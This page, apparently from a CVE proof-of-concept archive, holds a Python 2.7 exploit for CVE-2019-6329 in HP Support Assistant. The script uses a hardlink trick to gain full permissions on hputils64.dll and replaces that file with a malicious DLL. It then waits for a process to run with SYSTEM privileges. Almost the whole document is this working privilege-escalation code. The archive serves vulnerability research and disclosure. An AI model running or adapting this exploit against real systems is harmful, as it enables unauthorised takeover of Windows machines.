4837 Total CVEs
26 Years
GitHub
Home / 2019 / CVE-2019-6329
README.md
Rendering markdown...
POC / PrivHP4.py PY
⬇ Raw GitHub ✕ Close 
#coding: utf-8
'''
working with:
    + python 2.7
    + HP Support Assistant: 8.7.50.3
    + Windows 10 64bit
Please install necessary NET frameworks if asked when running the exploit

Source:
    + CreateHardlink.exe: from symboliclink-testing-tools-master (https://github.com/googleprojectzero/symboliclink-testing-tools)
    + CreateProcess.exe: CreateProcess.cpp
    + userenv.dll: DllLoadInvader.cpp
    + invader.exe: invader.cs
'''
import subprocess
import os
import time
import ntpath
import __main__
startTime = time.time()

mainDir = os.path.dirname(os.path.realpath(__main__.__file__))
tmpDir = os.getenv('tmp')+'\\HPBatteryCheck'

HPBatteryCheckDir = mainDir+'\\BatteryTest'
clientExe = tmpDir+'\\BatteryTest.exe'
createProcess = mainDir+'\\CreateProcess.exe'
createHardLink = mainDir+'\\CreateHardlink.exe'
victim = 'C:\\Program Files (x86)\\HP\\Shared\\hputils64.dll'
hardlink = 'C:\\ProgramData\\Hewlett-Packard\\HP Support Framework\\Logs\\Temp\\HPSA\\hardlink.xml'
malDll = mainDir+'\\MalDll.dll'

# create a folder name HPBatteryCheck in tmp folder
if not os.path.exists(tmpDir):
    os.mkdir(tmpDir)

# copy HPBatteryCheck dir to %tmp%\HPBatteryCheck
os.system('copy "%s" "%s"' % (HPBatteryCheckDir, tmpDir))


# create hardlink
pTmp = subprocess.Popen([createHardLink, hardlink, victim])
pTmp.communicate()

# create client
pCreate = subprocess.Popen([createProcess, '"%s"' % clientExe])
pCreate.communicate()

# waiting for permissions to be modified
while(True):
    pTmp = subprocess.Popen(['C:\\Windows\\System32\\icacls.exe', 'C:\\Program Files (x86)\\HP\\Shared\\hputils64.dll'], stdout=subprocess.PIPE)
    out, err = pTmp.communicate()
    if 'BUILTIN\\Users:(F)' in out:
        print 'Successfully get full permissions on hputils64'
        break
    time.sleep(0.1)
data = open(malDll, 'rb').read()
open(victim, 'wb').write(data)
print 'Finished fake hputils64. Wait for notepad with SYSTEM permission'
while(True):
    pTmp = subprocess.Popen('tasklist', stdout=subprocess.PIPE)
    out, err = pTmp.communicate()
    for line in out.lower().split('\r\n'):
        if 'services' in line and 'notepad.exe' in line:
            print 'Notepad run!'
            elapsedTime = time.time() - startTime
            print 'Elapsed: %d seconds' % elapsedTime
            exit(0)
    print "Waiting"